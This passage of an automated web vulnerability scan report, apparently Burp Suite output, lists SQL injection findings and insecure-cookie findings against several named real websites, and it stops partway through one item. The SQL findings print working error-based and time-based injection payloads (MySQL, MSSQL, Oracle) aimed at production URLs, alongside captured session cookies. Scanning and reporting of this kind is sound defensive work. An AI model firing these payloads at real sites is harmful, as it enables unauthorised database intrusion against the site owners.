<html xmlns="http://www.w
...[SNIP]...
10. SQL statement in request parameter  previous  next
There are 6 instances of this issue:

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

10.1. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/PaymentDetails.asp

Request

GET /billing_view/PaymentDetails.asp?id=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Host: hmficweb.hinghammutual.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 26 Mar 2011 12:02:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 733
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQCBBBAA=KKFFOKOCHHEPGHNPBIGNGGCI; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - View Payment Details</TITLE>
</
...[SNIP]...
10.2. http://www.bluestarfibres.com/page.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bluestarfibres.com
Path:   /page.php

Request

GET /page.php?path='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&print=true HTTP/1.1
Host: www.bluestarfibres.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:45 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Content-Type: text/html
Content-Length: 739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://www.blue
...[SNIP]...
10.3. http://www.insideup.com/ppc/leadflow/hins00/project.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
10.4. http://www.nutter.com/careers.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nutter.com
Path:   /careers.php

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:32 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15724

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
10.5. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:14:03 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 22914


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
10.6. https://www.territoryahead.com/jump.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:25:30 GMT
Server: Apache
ETag: "AAAAS7ub8DG"
Last-Modified: Fri, 25 Mar 2011 19:13:44 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38533


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
11. SSL cookie without secure flag set  previous  next
There are 9 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

11.1. https://www.territoryahead.com/jump.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:24:53 GMT
Server: Apache
ETag: "AAAAS7ub/Mx"
Last-Modified: Fri, 25 Mar 2011 19:13:57 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=63503913; Path=/; Expires=Fri, 08-Apr-2011 19:13:07 GMT
Set-Cookie: customer=92643931; Path=/; Expires=Sat, 23-Mar-2019 19:13:07 GMT
Set-Cookie: JSESSIONID=auMBUcQMcNOb; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38180


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
11.2. https://feedback.discoverbing.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.discoverbing.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&scrx=1 HTTP/1.1
Host: feedback.discoverbing.com
Connection: keep-alive
Referer: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; LNG=feedback.discoverbing.com=en-us; MSIDCookie=33f87e5c-7c8d-48b0-8858-d3cd02b35031

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 26 Mar 2011 01:00:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; expires=Sat, 26-Mar-2011 02:00:06 GMT; path=/
Set-Cookie: LNG=feedback.discoverbing.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: scrx=1; expires=Mon, 26-Mar-2012 01:00:06 GMT; path=/
Vary: Accept-Encoding
Content-Length: 26967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
11.3. https://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?isc=GPASH002 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageTwo; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:21 GMT
Content-Length: 250092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
11.4. https://www.godaddy.com/Hosting/web-hosting.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Hosting/web-hosting.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Hosting/web-hosting.aspx?ci=13891&isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; serverVersion=A; domainYardVal=%2D1; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Hosting/web-hosting.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=ci=13891&isc=gpash016%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash016&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:30 GMT
Content-Length: 161114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
11.5. https://www.godaddy.com/catalog.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /catalog.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /catalog.aspx?isc=GPASH009&se=%2B&ci=287 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/catalog.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH009&se=%2b&ci=287%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH009&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:35 GMT
Content-Length: 108151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
11.6. https://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx?isc=gpash003 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=gpash003%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash003&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=dbegbbdjagnaejceielbzacgmhtcefba; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:34 GMT
Content-Length: 210017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
11.7. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/hosting/landing.asp?isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
